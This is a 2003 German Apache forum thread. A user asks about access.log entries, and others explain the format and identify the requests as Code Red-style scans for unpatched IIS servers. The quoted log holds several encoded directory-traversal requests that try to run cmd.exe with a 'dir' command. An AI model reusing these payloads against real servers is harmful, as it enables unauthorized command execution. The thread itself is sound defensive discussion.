Suche Erklärung zur "access.log"

Alles, was den Apache betrifft, kann hier besprochen werden.

Suche Erklärung zur "access.log"

Postby Paul C. » 26. September 2003 18:32

tach zusammen,

ich bin neu hier und erhoffe mir auf diesem Wege eine Erklärung für meine Frage:

Wo kann man sich schlau machen, um solche Einträge besser / überhaupt zu verstehen?

Auszug aus der ACCESS.LOG

---------------------------------------------------

80.186.62.254 - - [26/Sep/2003:19:06:26 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:32 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:33 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:43 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:44 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:47 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:48 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:52 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1121
80.186.62.254 - - [26/Sep/2003:19:06:53 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:06:55 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1048
80.186.62.254 - - [26/Sep/2003:19:06:56 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1048
80.186.62.254 - - [26/Sep/2003:19:06:57 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434
80.186.62.254 - - [26/Sep/2003:19:07:07 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434

---------------------------------------------------

Ich bin für jeden Hinweis dankbar.

Danke, Paul
Paul C.
 
Posts: 2
Joined: 26. September 2003 18:27

Postby Benzman » 26. September 2003 18:41

Die Einträge brauchst du weder zu verstehn noch überhaupt zu beachten. Da hat nur jemand geschaut ob er bei deinem Apache eine Sicherheitslücke ausnutzen kann, die eigentlich schon längst behoben wurde. Das sieht man auch an der Antwort des Servers (vorletzte Zahl in jeder Zeile). Wenn die mit 4 angeht, bedeutet das, dass ein Fehler aufgetreten ist und der Typ nur eine Fehlerseite angezeigt bekommt. 404 z.b ist Not Found und 400 ist Bad Request.
User avatar
Benzman
 
Posts: 132
Joined: 27. July 2003 18:46
Location: Bayern

Postby nemesis » 27. September 2003 16:01

Benzman wrote:Da hat nur jemand geschaut ob er bei deinem Apache eine Sicherheitslücke ausnutzen kann, die eigentlich schon längst behoben wurde.


Hajo, das ist und war nie ein Problem des Apache ;) Entweder ist es noch der Code Red Wurm was rumgeistert, oder jemand scannt da immer noch nach ungepatchten IIS-Servern (M$ Produkt), dies immer noch gibt....
Ubuntu 8.04 | SMP P3 1.4 GHz | 6 GByte RegECC | 74 GByte Seagate 15k5 system | 3Ware 9550SXU-4LP with 4x 500 GByte Seagate ES2 Raid 10 data | StoreCase DE400 | PX-230A | Intel Pro/1000MT Dual PCI-X
User avatar
nemesis
AF Moderator
 
Posts: 999
Joined: 29. December 2002 13:14
Location: Ingolstadt

DANKE!

Postby Paul C. » 29. September 2003 18:13

Obwohl ich jetzt etwas beruhigter bin, würde mich schon genauer interessieren, was denn die Meldungen bedeuten

Vielen Dank für die prompten Antworten
Paul
Paul C.
 
Posts: 2
Joined: 26. September 2003 18:27

Postby Brody » 30. September 2003 13:09

nun, genau weiss ichs auch nicht. tatsache ist, dass jemand einfach mal schaut, ob und was er auf deinem server noch so machen könnte.

rumschnüffeln halt. was die aufrufe im detail sind, wollte ich gerade heute nämlich auch mal fragen. welcher aufruf bewirkt was, und so.

aber ich mache anders. ich sperre diese ips jetzt einfach aus mit .htaccess datei.
Brody
 
Posts: 22
Joined: 31. July 2003 21:32

Postby Benzman » 30. September 2003 14:48

Ich nehm einfach mal diese Zeile zum erklären her:
80.186.62.254 - - [26/Sep/2003:19:06:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 434

Die einzelnen Sachen bedeuten folgendes:
80.186.62.254 : IP des Angreifers
[26/Sep/2003:19:06:54 +0200] : Zeit, wann daruaf zugegriffen wurde (das +0200 bedeutet GMT +2 std.)
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" : Der Befehl, den der Webserver vom Angreifer bekommen hat. Der Befehl wird zum Beispiel gesendet, wenn der Angreifer http://deineip/scripts/..%c1%9c../winnt ... exe?/c+dir eingegeben hat.
404 : Das ist die Serverantwort. 404 bedeutet wie schon gesagt "Seite nicht gefunden".
434 : Das sind glaub ich die Anzahl der Bytes, die gesendet wurden.
User avatar
Benzman
 
Posts: 132
Joined: 27. July 2003 18:46
Location: Bayern

Postby Brody » 30. September 2003 14:59

ja, dachte ich mir, danke schön. was die commands machen sollen, geht nicht hervor?

so nach dem motto: zeige mir inhalt von festplatte c oder so?
Brody
 
Posts: 22
Joined: 31. July 2003 21:32

Postby Oswald » 30. September 2003 14:59

Benzman wrote:434 : Das sind glaub ich die Anzahl der Bytes, die gesendet wurden.


Richtig!
User avatar
Oswald
Apache Friends
 
Posts: 2718
Joined: 26. December 2002 19:51
Location: Berlin, Germany
XAMPP Version: 5.5.19
Operating System: Linux

Postby Benzman » 30. September 2003 17:46

Ich würde sagen mit /winnt/system32/cmd.exe?/c+dir will er die cmd.exe starten und darin dann den Befehl "dir" ausführen, der nur alle dateien in einem verzeichnis auflistet. Also das was er gemacht hat, schadet dem PC nicht. Nicht mal wenn du die ungepatchte Version vom IIS hättest, wäre was passiert. Er hätte dann nur gesehn, ob er die Lücke ausnutzen kann.
User avatar
Benzman
 
Posts: 132
Joined: 27. July 2003 18:46
Location: Bayern


Return to Apache

Who is online

Users browsing this forum: No registered users and 2 guests